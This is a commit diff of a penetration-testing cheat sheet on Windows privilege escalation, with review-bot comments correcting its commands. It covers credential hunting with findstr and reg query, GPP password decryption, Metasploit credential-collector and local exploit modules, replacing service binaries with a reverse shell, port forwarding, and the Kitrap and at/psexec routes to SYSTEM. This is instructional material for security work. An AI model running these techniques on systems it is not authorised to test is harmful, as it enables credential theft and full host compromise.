Commit 17dfcc13 authored by bobloblaw

Update privilege_escalation_windows.md

parent 33e0b662
+142 −160

## Processes running

```
# The cronjob of windows
schtasks /query /fo LIST /v

# Running services
tasklist /SVC
net start

# Running processes
tasklist /v



# List all drivers
driverquery
```

## Users and domain

```
net users
net localgroups

# View Domain Groups
net group /domain

# View Members of Domain Group
net group /domain <Group Name>
```

### List all patches

```
wmic qfe get Caption,Description,HotFixID,InstalledOn
```

## References

http://www.fuzzysecurity.com/tutorials/16.html


# Privilege escalation windows

Look for vulnerable services that may be running as system

There are usually three types of users on a windows machine:

1. System
2. Administrator
3. Regular user
We now have a low-privileges shell that we want to escalate into a privileged shell.

The process can be automatd with the windows-priv-esc checker.
http://pentestmonkey.net/tools/windows-privesc-check
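Review bot: `net localgroups` in the "Users and domain" block is not a valid command; the verb is singular, `net localgroup`, and the plural form fails with a syntax message. In the same block, `net group /domain <Group Name>` should follow the documented argument order, `net group "<Group Name>" /domain`. Below it, "automatd" in the windows-privesc-check sentence should read "automated".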
@@ -58,47 +8,13 @@ http://pentestmonkey.net/tools/windows-privesc-check
If you are admin you can use this tool to get SYSTEM.
https://technet.microsoft.com/en-us/sysinternals/bb897553

## Metasploit - The easy way

So if you have a metasploit meterpreter session going you can run **getsystem**.

### Post modules

First you need to background the meterpreter shell and then you just run the post modules.
You can also try some different post modules. 

```
use exploit/windows/local/service_permissions

post/windows/gather/credentials/gpp

exploit/windows/local/trusted_service_path

run post/windows/gather/credential_collector 

run post/multi/recon/local_exploit_suggester

run post/windows/gather/enum_shares

run post/windows/gather/enum_snmp

run post/windows/gather/enum_applications

run post/windows/gather/enum_logged_on_users

run post/windows/gather/checkvm 
```


## Manually

### Basic Enumeration of the System

Before we start looking for privilege escalation opportunities we need to understand a bit about the machine.

## Basic Enumeration of the System

Before we start looking for privilege escalation opportunities we need to understand a bit about the machine. We need to know what users have privileges. What patches/hotfixes the system has.  

```
# Basics
systeminfo
hostname

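Review bot: the "Post modules" block mixes three invocation styles and the lead-in sentence gets the order wrong for most of them. The `run post/...` lines execute inside the live meterpreter session and need no backgrounding, whereas `use exploit/windows/local/service_permissions` and `exploit/windows/local/trusted_service_path` are msfconsole modules that do require backgrounding the session and then `set SESSION <id>` before `run`; the bare `post/windows/gather/credentials/gpp` line has no verb at all. Give every line a consistent prefix and say which ones take a SESSION option. Also, "Basic Enumeration of the System" now appears twice in a row (once as ### and once as ##) with the same opening sentence; keep only the ## version.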
@@ -106,12 +22,19 @@ hostname
whoami
echo %username%

# What users are on the machine?
# What users/localgroups are on the machine?
net users
net localgroups

# More info about a specific user
# More info about a specific user. Check if user has privileges.
net user user1

# View Domain Groups
net group /domain

# View Members of Domain Group
net group /domain <Group Name>

# Firewall
netsh firewall show state
netsh firewall show config
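Review bot: `net localgroups` in the "What users/localgroups are on the machine?" block is the same typo for `net localgroup` as earlier in the diff; the plural form does not exist. Separately, `netsh firewall show state` and `netsh firewall show config` use the legacy firewall context that Windows 7 and Server 2008 R2 deprecated in favour of `netsh advfirewall`; suggest adding `netsh advfirewall show allprofiles` so the firewall enumeration also works on Vista-and-newer hosts.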
@@ -120,13 +43,14 @@ netsh firewall show config
ipconfig /all
route print
arp -A
```

Even the manual way can be speeded up. Using this awesome script (wmic_info.bat). Found here: http://www.fuzzysecurity.com/tutorials/16.html 
# How well patched is the system?
wmic qfe get Caption,Description,HotFixID,InstalledOn
```

### Cleartext passwords
## Cleartext Passwords

Can be find like this:
### Search for them

```
findstr /si password *.txt
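Review bot: `arp -A` should be `arp -a`; the documented Windows arp.exe switch for listing the cache is lowercase `-a` (or `-g`), and `-A` is not documented, so it may print usage instead of the table. The fence layout in this hunk is also off: the closing ``` after `arp -A` is followed by the `# How well patched is the system?` / `wmic qfe ...` lines and then a second closing fence, so depending on which fence survives the patch-level query ends up either outside the enumeration block or inside an unterminated one. Keep the wmic qfe lines inside the block and drop the stray fence.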
@@ -136,14 +60,15 @@ findstr /si password *.ini
#Find all those strings in config files.
dir /s *pass* == *cred* == *vnc* == *.config*

# Find all pass in all files.
# Find all passwords in all files.
findstr /spin "password" *.*
findstr /spin "password" *.*
```

### In Files

These are common files to find them in. They might be base64-encoded. So look out for that. 

**In files**
```
c:\sysprep.inf
c:\sysprep\sysprep.xml
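Review bot: `findstr /spin "password" *.*` appears twice back to back and the new text keeps both; drop one. Two caveats belong next to it: `/p` skips any file containing non-printable characters, so UTF-16 and binary-ish config files are silently excluded, and the search only covers the current directory tree, so run it from `c:\` (or pass `c:\*.*`) to actually cover the disk. The "base64-encoded" remark is right for sysprep.inf / sysprep.xml; saying which field to decode (the `AdminPassword` value in sysprep.inf, the `<Value>` elements in the xml) would save readers a search.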
@@ -156,7 +81,8 @@ dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini
```

**In registry**
### In Registry

```
# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"
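Review bot: `dir c:\ /s /b | findstr /si *vnc.ini` does not do what it looks like: findstr patterns are regular expressions, not globs, so the leading `*` is not a wildcard, the `.` matches any character, and `/s` (search subdirectories) is meaningless on piped input. `findstr /i "vnc\.ini"` gives the intended match, or just keep the `dir c:\*ultravnc.ini /s /b` form on the line above, which is a real filesystem glob.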
@@ -175,10 +101,10 @@ reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
```

**Group Policy Preference**
If the machine belongs to a domain and your user has access to "System Volume Information" there might be some sensitive files there.
### Group Policy Preference
If the machine belongs to a domain and your user has access to **System Volume Information** there might be some sensitive files there.

Look for the file **Groups.xml**. It might be encrpted the password. But the encryption.key can be found on windows homepage. Other interesting files here might be
Look for the file **Groups.xml**. It might be encrypted the password. But the encryption.key can be found on windows homepage. Other interesting files here might be

```
Services\Services.xml: Element-Specific Attributes
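Review bot: the Group Policy Preference paragraph points at the wrong location. GPP XML files (Groups.xml, Services.xml, Drives.xml, DataSources.xml) live in the domain SYSVOL share under `\\<domain>\SYSVOL\<domain>\Policies\{GUID}\...`, which every domain user can read; "System Volume Information" is the hidden local NTFS folder on each drive and is unrelated. The sentence "It might be encrypted the password" is still ungrammatical after the spelling fix; suggest "The `cpassword` attribute holds an AES-encrypted password, and Microsoft published the static key in the MS-GPPREF documentation, so it decrypts offline (this is what the metasploit gpp module does)".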
@@ -188,32 +114,15 @@ Drives\Drives.xml: Element-Specific Attributes
DataSources\DataSources.xml: Element-Specific Attributes
```

### Internal services

Sometimes there are services that are only accessible from inside the network. For example a MySQL server might not be accessible from the outside, for security reasons. It is also common to have different administration applications that is only accessible for the target. Like a printer interface, or something like that. These services might be more vulnerable since they are not meant to be seen from the outside.
## Internal/Hidden Services

So basically run 
Sometimes there are services that are only accessible from inside the network. For example a MySQL server might not be accessible from the outside, for security reasons. It is also common to have different administration applications that is only accessible from inside the network/machine. Like a printer interface, or something like that. These services might be more vulnerable since they are not meant to be seen from the outside.

```
netstat -ano
```

And look for LISTENING. Then you compare that to the scan you did from the outside.
Does it contain any ports that are not accessible from the outside?

If that is the case, maybe you can make a remote forward to access it.

```
# Port forward using plink
plink.exe -l root -pw mysecretpassword 192.168.0.101 -R 8080:127.0.0.1:8080

# Port forward using meterpreter
portfwd add -l <attacker port> -p <victim port> -r <victim ip>
portfwd add -l 3306 -p 3306 -r 192.168.222
```

So how should we interpret the netstat output?

Example output:
```
Proto  Local address      Remote address     State        User  Inode  PID/Program name
    -----  -------------      --------------     -----        ----  -----  ----------------
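Review bot: the sample output under "So how should we interpret the netstat output?" is Linux netstat output, not output of the `netstat -ano` command the section tells the reader to run: the `User`, `Inode` and `PID/Program name` columns, the lowercase `tcp`/`udp` protocol names and the `0.0.0.0:*` remote address do not occur on Windows, which prints `Proto  Local Address  Foreign Address  State  PID`. Replace the sample with real Windows output, or label it as a Linux sample, so readers know which columns to read. Also `portfwd add -l 3306 -p 3306 -r 192.168.222` has a three-octet address; it needs a full IPv4 address.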
@@ -231,17 +140,32 @@ Proto Local address Remote address State User Inode PID/Progr
    udp    192.168.1.9:500    0.0.0.0:*                       0     0      -
```

Look for **LISTENING/LISTEN**. Compare that to the scan you did from the outside.
Does it contain any ports that are not accessible from the outside?

If that is the case, maybe you can make a remote forward to access it.

```
# Port forward using plink
plink.exe -l root -pw mysecretpassword 192.168.0.101 -R 8080:127.0.0.1:8080

# Port forward using meterpreter
portfwd add -l <attacker port> -p <victim port> -r <victim ip>
portfwd add -l 3306 -p 3306 -r 192.168.222
```

So how should we interpret the netstat output?

**Local address 0.0.0.0**
Local address 0.0.0.0 means that the service is listening on all interfaces. This means that it can receive a connection from the network card, from the loopback interface or any other interface. This means that anyone can connect to it.

**Local address 127.0.0.1**
Local address 127.0.0.1 means that the service is only listening for connection from the your PC. Not from the internet or anywhere else. This is interesting to us!
Local address 127.0.0.1 means that the service is only listening for connection from the your PC. Not from the internet or anywhere else. **This is interesting to us!**

**192.168.1.9**
Local address 192.168.1.9 means that the service is only listening for connections from the local network. So someone in the local network can connect to it, but not someone from the internet. This is also interesting to us!
**Local address 192.168.1.9**
Local address 192.168.1.9 means that the service is only listening for connections from the local network. So someone in the local network can connect to it, but not someone from the internet. **This is also interesting to us!**


### Kernel exploits
## Kernel exploits

Just as in windows kernel exploits should be our last resource, since it might but the machine in an unstable state or create some other problem with the machine. 

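Review bot: two of the interpretation paragraphs overstate what a bind address tells you. A `0.0.0.0` listener is reachable on every interface, but "anyone can connect to it" still depends on the host firewall and whatever sits in front of the box; a `192.168.1.9` listener is bound to that interface, which says nothing about whether the internet can reach it (that is a routing/NAT question), so "only listening for connections from the local network" should read "only on the 192.168.1.9 interface, reachable subject to firewall rules". The emphasis belongs on `127.0.0.1`, which really is local-only. In the kernel-exploits paragraph, "Just as in windows" should be "Just as on Linux" (this is the Windows document, evidently copied from the Linux one), "last resource" should be "last resort", and "might but the machine" should be "might put the machine".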
@@ -252,13 +176,13 @@ wmic qfe get Caption,Description,HotFixID,InstalledOn
```


#### Python to binary
### Python to Binary

If we have an exploit written in python but we don't have python installed on the victim-machine we can always transform it into a binary with pyinstaller. Good trick to know.

### Schedualed tasks
## Scheduled Tasks

Here we are looking for tasks that are run with by a priviliged user, and run a binary that we can overwrite.
Here we are looking for tasks that are run with by a privileged user, and run a binary that we can overwrite.

```
schtasks /query /fo LIST /v
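Review bot: "tasks that are run with by a privileged user" in the Scheduled Tasks lead-in still has the doubled preposition after the spelling fix; read "run by a privileged user". Since the section is about overwritable binaries, name the two fields of `schtasks /query /fo LIST /v` output that matter, `Run As User` and `Task To Run`, and state the actual check: whether the path in `Task To Run` (or a directory on that path) is writable by the current user, e.g. with `icacls` as is done later for services.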
@@ -266,30 +190,29 @@ schtasks /query /fo LIST /v

This might produce a huge amount of text. I have not been able to figure out how to just output the relevant strings with findstr. So if you know a better way please notify me. As for now I just copy-paste the text and past it into my linux-terminal and run.

Yeah I know this ain't pretty, but it works. You can of course change the name SYSTEM to another priviliged user.
Yeah I know this ain't pretty, but it works. You can of course change the name SYSTEM to another privileged user.

```
cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
```

### Weak service permissions
## Weak Service Permissions

Services on windows are programs that run in the background. Without a GUI.

If you find a service that has read-write permissions set to everyone you can just change that binary into a binary that adds a user to the administrators group and thereby giving it privileges.

First we need to find services. That can be done using **wmci**. Wmci is not availbe on all windows machines, and it might not be avaliable to your user. If you don't have access to it, there is a workaround using sc.exe. See further down. But if wmci is availible, you can use it like this.
If you find a service that has write permissions set to everyone you can change that binary into your custom binary and make it execute in the privileged context.

First we need to find services. That can be done using **wmci** or **sc.exe**. Wmci is not available on all windows machines, and it might not be available to your user. If you don't have access to it, you can use **sc.exe**.

#### WMCI
### WMCI

```
wmic service list brief
```

This will produce a lot out output and we need to know which one of all of these services have weak permissions. In order to check that we can use the icalcs program. Notice that icalcs is only available from Vista and up. XP has calcs instead.
This will produce a lot out output and we need to know which one of all of these services have weak permissions. In order to check that we can use the **icalcs** program. Notice that **icalcs** is only available from Vista and up. XP and lower has **calcs** instead.

As you can see in the command you need to make sure that you have access to wimc, icalcs and write privilege in windows\temp.
As you can see in the command below you need to make sure that you have access to wimc, icalcs and write privilege in windows\temp.

```
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
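Review bot: the "I have not been able to figure out how to just output the relevant strings with findstr" paragraph can be answered instead of shipped: findstr treats each space-separated word as a separate search string unless `/c:` is used, which is why naive attempts fail; `schtasks /query /fo LIST /v | findstr /i /c:"Task To Run" /c:"Run As User"` prints the two relevant fields without a detour through a Linux terminal, and the grep can stay as an alternative. In the Weak Service Permissions text the tool is `wmic` (the command at the bottom of the hunk spells it correctly), not "wmci" or "wimc", and the ACL tools are `icacls` and `cacls`, not "icalcs" and "calcs"; these misspellings run through the whole section, so fix them together. "a lot out output" should read "a lot of output".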
@@ -297,7 +220,9 @@ for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^
for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"
```

##### SC.exe
Binaries in system32 are excluded since they are mostly correct, since they are installed by windows.

#### SC.exe

```
sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt
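Review bot: two edge cases of the wmic/icacls loop are worth stating next to it, since the new sentence only says that system32 binaries are excluded. First, `for /f eol^=^"^ delims^=^"` makes `"` the end-of-line (comment) character, so every PathName that begins with a quote is skipped rather than checked: correctly quoted paths with spaces never reach icacls. Second, PathName values that carry arguments (for example `C:\Program Files\X\svc.exe -k foo`) are handed to icacls as one string, which then reports the path as not found. Readers should expect both kinds of false negatives, which makes the SC.exe route below (one `cacls` call per cleaned-up path) the more reliable of the two. Also note that the loop appends with `>>`, so a stale permissions.txt in `c:\windows\temp` from an earlier run gets re-checked.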
@@ -316,19 +241,22 @@ Now you can process them one by one with the cacls command.
cacls "C:\path\to\file.exe"
```

Binaries in system32 are excluded sine they are mostly correct, since they are installed by windows. What we are interested in is binaries that have been installed by the user.In the output you want to look for **BUILTIN\Users:(F)**.

### Look for Weakness

What we are interested in is binaries that have been installed by the user. In the output you want to look for **BUILTIN\Users:(F)**. Or where your user/usergroup has **(F)** or **(C)** rights.

Example:

```
C:\path\to\file.exe BUILTIN\Users:F
C:\path\to\file.exe 
BUILTIN\Users:F
BUILTIN\Power Users:C 
BUILTIN\Administrators:F 
NT AUTHORITY\SYSTEM:F 
```

http://chairofforgetfulness.blogspot.cl/2014/01/better-together-scexe-and.html

That means your user has write access. So you can just rename the .exe file and add your own. And then restart the program and your program will be exevuted instead. This can be a simple getsuid program or a reverse shell that you create with msfvenom.

That means your user has write access. So you can just rename the .exe file and then add your own malicious binary. And then restart the program and your binary will be executed instead. This can be a simple getsuid program or a reverse shell that you create with msfvenom.

Here is a POC code for getsuid.

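Review bot: the "Look for Weakness" guidance mixes the two ACL tools' notations and misses the usual weak principals. `icacls` prints rights in parentheses, `BUILTIN\Users:(F)` or `(M)`, while `cacls` (used on the SC.exe route) prints them bare, `BUILTIN\Users:F` / `C`, as in the example block; say which tool produced the sample so readers do not search icacls output for `:F`. `Everyone`, `NT AUTHORITY\Authenticated Users` and `BUILTIN\Power Users` holding F, M, C or W are just as exploitable as `BUILTIN\Users` and belong in the list. One correction to the exploitation sentence: renaming the .exe needs delete rights on the file (or write on its directory); with write access on the file alone you cannot rename it, but you can overwrite it in place once the service is stopped. Finally, "getsuid" is Linux vocabulary; the Windows POC referenced here adds a user to Administrators, so call it that. The chairofforgetfulness link sits in the middle of the explanation and appears again in a later hunk; one copy under the references is enough.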
@@ -342,21 +270,29 @@ return 0;
}
```

We then compile it with out cross-compiler, if you are on linux, like this:
We then compile it with our cross-compiler like this:

```
i686-w64-mingw32-gcc windows-exp.c -lws2_32 -o exp.exe
```

rever-shell with msfvenom.
### Restart the Service

Okay, so now that we have either create our setuid or our reverse shell we need to restart the program, we can do that using wmci. Like this
Okay, so now that we have a malicious binary in place we need to restart the service so that it gets executed. We can do this by using **wmic** or **net** the following way:

```
wmic service NAMEOFSERVICE call startservice
```

If your meterpreter session dies you need to remember to first migrate it to a more stable service. A common service to migrate to is winlogon.exe since it is run by system and it is always run. You can find the PID like this
```
net stop [service name] && net start [service name].
```

The binary should be executed in the SYSTEM or Administrator context.

### Migrate the Meterpreter Shell

If your meterpreter session dies right after you get it you need migrate it to a more stable service. A common service to migrate to is winlogon.exe since it is run by system and it is always run. You can find the PID like this:

```
wmic process list brief | find "winlogon"
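Review bot: `net stop [service name] && net start [service name].` has a trailing period inside the code fence; drop it. More importantly, restarting the service is not something a low-privileged user can assume: both `net start` and `wmic service ... call startservice` need the SERVICE_START / SERVICE_STOP rights on the service object, which is a separate ACL from the binary's file permissions. Suggest adding the check (`sc sdshow <service>` prints the service SDDL; `accesschk.exe -ucqv <service>` from Sysinternals prints it readably) and the fallback when those rights are missing: if the service is set to auto-start, a reboot (`shutdown /r /t 0`, which needs SeShutdownPrivilege) or simply waiting for the next restart runs the replaced binary. The migration paragraph ("If your meterpreter session dies ...") now appears both just before the net stop block and under its own "Migrate the Meterpreter Shell" heading; keep only the headed one.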
@@ -364,21 +300,23 @@ wmic process list brief | find "winlogon"

So when you get the shell you can either type **migrate PID** or automate this so that meterpreter automatically migrates.  

http://chairofforgetfulness.blogspot.cl/2014/01/better-together-scexe-and.html

### Unquoted Service Paths
## Unquoted Service Paths

This attack is explained here:
http://toshellandback.com/2015/11/24/ms-priv-esc/

There is also a metasploit module for this is: exploit/windows/local/trusted_service_path

## Vulnerable Drivers

### Vulnerable Services

#### Service Binaries

#### Windows Services
Some driver might be vulnerable. I don't know how to check this in an efficient way.

```
# List all drivers
driverquery
```

### AlwaysInstallElevated

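Review bot: the "Unquoted Service Paths" section only links out; give the reader the condition to test for in one sentence: the service's ImagePath contains spaces, is not quoted, and the user can write to one of the directories the path passes through (for `C:\Program Files\Some Dir\service.exe` Windows tries `C:\Program.exe` and `C:\Program Files\Some.exe` first), and add the standard enumeration one-liner `wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """`. Below it, "Vulnerable Services", "Service Binaries" and "Windows Services" are headings with nothing under them, and "Vulnerable Drivers" has only `driverquery` plus "I don't know how to check this in an efficient way"; either fill these or remove the empty headings so the rendered page does not carry three orphan titles.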
@@ -389,13 +327,12 @@ reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevat

http://toshellandback.com/2015/11/24/ms-priv-esc/

### Unattended Installs

### Get SYSTEM user from a user with Administrator privilieges.
## Escalate to SYSTEM from Administrator

#### On windows XP
### On Windows XP and Older

If you have a GUI with a user that is included in Administrators group you first need to open up a cmd.exe for the administrator. If you open up the cmd that is in Accessories it will be opened up as a normal user. And if you rightclik and do Run as administrator you might need to know the Administrators password. Which you might not know. So instead you open up the cmd from c:\windows\system32\cmd.exe. This will give you a cmd with Administratos rights.
If you have a GUI with a user that is included in Administrators group you first need to open up a cmd.exe for the administrator. If you open up the cmd that is in Accessories it will be opened up as a normal user. And if you rightclick and do **Run as Administrator** you might need to know the Administrators password. Which you might not know. So instead you open up the cmd from **c:\windows\system32\cmd.exe**. This will give you a cmd with Administratos rights.

From here we want to become SYSTEM user. To do this we run:

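Review bot: two points on this hunk. The AlwaysInstallElevated query shown is the HKCU one; the technique only works when the value is 1 under both `HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer` and `HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer`, so both keys need querying and the text should say both must be set before a crafted .msi installs as SYSTEM. The XP paragraph's advice is not an escalation step: XP has no UAC, so a cmd.exe started from the Accessories shortcut by a member of Administrators already runs with full administrator rights, exactly like one started from `c:\windows\system32\cmd.exe` (the shortcut points at that same binary); the paragraph can be reduced to "open any cmd.exe as a member of Administrators". "Administratos rights" is still misspelled in the new line, and "Unattended Installs" is another empty heading.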
@@ -405,13 +342,12 @@ First we check what time it is on the local machine:
time

# Now we set the time we want the system CMD to start. Probably one minuter after the time.

at 01:23 /interactive cmd.exe
```

And then the cmd with SYSTEM privs pops up.

#### Vista and up
### Vista and Newer

You first need to upload PsExec.exe anad then you run:

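Review bot: the `at 01:23 /interactive cmd.exe` trick comes with constraints that belong in the text: the Task Scheduler (`Schedule`) service must be running, `at` itself requires administrator rights, and `/interactive` only produces a visible SYSTEM window on XP / Server 2003, where services still share the console session; from Vista onward session 0 isolation means the cmd.exe starts invisibly in session 0, and `at` is deprecated in favour of `schtasks` from Windows 8 / Server 2012 on, which is why the next subsection switches to PsExec. "one minuter after" should be "one minute after".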
@@ -419,6 +355,16 @@ You first need to upload PsExec.exe anad then you run:
psexec -i -s cmd.exe
```

### Kitrap

On some machines the **at 20:20** trick does not work. It never works on Windows 2003 for example. Instead you can use Kitrap. Upload both files and execute vdmaillowed.exe. I think it only works with GUI.

```
vdmallowed.exe
vdmexploit.dll
```


Most recommended article

http://travisaltman.com/windows-privilege-escalation-via-weak-service-permissions/
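Review bot: the Kitrap subsection names the binary inconsistently: the prose says `vdmaillowed.exe`, the code block `vdmallowed.exe`, and the latter is the real file name. It also refers to "the **at 20:20** trick" while the earlier example used `01:23`; pick one time or say "the at /interactive trick". Two facts a reader needs before uploading it: KiTrap0D is the MS10-015 (CVE-2010-0232) NTVDM bug, so it fails on any host patched after February 2010 (check the `wmic qfe` list for KB977165), and it only works on 32-bit Windows because 64-bit builds have no NTVDM; that firm requirement is more useful than "I think it only works with GUI". For the PsExec line, add `-accepteula` (`psexec -accepteula -i -s cmd.exe`) so it does not hang on the licence dialog in a non-interactive shell.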
@@ -442,3 +388,39 @@ https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp

http://pwnwiki.io/#!privesc/windows/index.md

## Using Metasploit

So if you have a metasploit meterpreter session going you can run **getsystem**.

### Post modules

First you need to background the meterpreter shell and then you just run the post modules.
You can also try some different post modules. 

```
use exploit/windows/local/service_permissions

post/windows/gather/credentials/gpp

exploit/windows/local/trusted_service_path

run post/windows/gather/credential_collector 

run post/multi/recon/local_exploit_suggester

run post/windows/gather/enum_shares

run post/windows/gather/enum_snmp

run post/windows/gather/enum_applications

run post/windows/gather/enum_logged_on_users

run post/windows/gather/checkvm 
```


## References

http://www.fuzzysecurity.com/tutorials/16.html
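Review bot: this "Using Metasploit" block duplicates, word for word, the "Metasploit - The easy way" section earlier in the same diff (same module list, same inconsistent `use` / bare path / `run` prefixes, same verb-less `post/windows/gather/credentials/gpp` line), so the file will carry the section twice; keep one copy, ideally this one at the end, and fix the prefixes there. The References heading lists a single URL while the "Most recommended article", PowerUp and pwnwiki links sit under no heading just above it; fold them into References.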